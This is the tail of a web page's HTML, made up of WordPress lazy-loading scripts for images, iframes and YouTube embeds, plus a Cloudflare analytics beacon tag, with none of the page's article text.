<script>window.lazyLoadOptions={elements_selector:"iframe[data-lazy-src]",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,callback_loaded:function(element){if(element.tagName==="IFRAME"&&element.dataset.rocketLazyload=="fitvidscompatible"){if(element.classList.contains("lazyloaded")){if(typeof window.jQuery!="undefined"){if(jQuery.fn.fitVids){jQuery(element).parent().fitVids()}}}}}};window.addEventListener('LazyLoad::Initialized',function(e){var lazyLoadInstance=e.detail.instance;if(window.MutationObserver){var observer=new MutationObserver(function(mutations){var image_count=0;var iframe_count=0;var rocketlazy_count=0;mutations.forEach(function(mutation){for(i=0;i<mutation.addedNodes.length;i++){if(typeof mutation.addedNodes[i].getElementsByTagName!=='function'){return}
if(typeof mutation.addedNodes[i].getElementsByClassName!=='function'){return}
images=mutation.addedNodes[i].getElementsByTagName('img');is_image=mutation.addedNodes[i].tagName=="IMG";iframes=mutation.addedNodes[i].getElementsByTagName('iframe');is_iframe=mutation.addedNodes[i].tagName=="IFRAME";rocket_lazy=mutation.addedNodes[i].getElementsByClassName('rocket-lazyload');image_count+=images.length;iframe_count+=iframes.length;rocketlazy_count+=rocket_lazy.length;if(is_image){image_count+=1}
if(is_iframe){iframe_count+=1}}});if(image_count>0||iframe_count>0||rocketlazy_count>0){lazyLoadInstance.update()}});var b=document.getElementsByTagName("body")[0];var config={childList:!0,subtree:!0};observer.observe(b,config)}},!1)</script><script data-no-minify="1" async src="https://www.tarlogic.com/wp-content/plugins/wp-rocket/assets/js/lazyload/16.1/lazyload.min.js"></script><script>function lazyLoadThumb(e){var t='<img src="https://i.ytimg.com/vi/ID/hqdefault.jpg" alt="" width="480" height="360">',a='<div class="play"></div>';return t.replace("ID",e)+a}function lazyLoadYoutubeIframe(){var e=document.createElement("iframe"),t="ID?autoplay=1";t+=0===this.dataset.query.length?'':'&'+this.dataset.query;e.setAttribute("src",t.replace("ID",this.dataset.src)),e.setAttribute("frameborder","0"),e.setAttribute("allowfullscreen","1"),e.setAttribute("allow", "accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture"),this.parentNode.replaceChild(e,this)}document.addEventListener("DOMContentLoaded",function(){var e,t,a=document.getElementsByClassName("rll-youtube-player");for(t=0;t<a.length;t++)e=document.createElement("div"),e.setAttribute("data-id",a[t].dataset.id),e.setAttribute("data-query", a[t].dataset.query),e.setAttribute("data-src", a[t].dataset.src),e.innerHTML=lazyLoadThumb(a[t].dataset.id),e.onclick=lazyLoadYoutubeIframe,a[t].appendChild(e)});</script>
<script defer src="https://static.cloudflareinsights.com/beacon.min.js/v652eace1692a40cfa3763df669d7439c1639079717194" integrity="sha512-Gi7xpJR8tSkrpF7aordPZQlW2DLtzUlZcumS8dMQjwDHEnw9I7ZLyiOj/6tZStRBGtGgN6ceN6cMH8z7etPGlw==" data-cf-beacon='{"rayId":"6c25c147df20e638","token":"bbccd33dc98545c9b5fdd6ea34fe3c2d","version":"2021.12.0","si":100}' crossorigin="anonymous"></script>
</body>
</html>
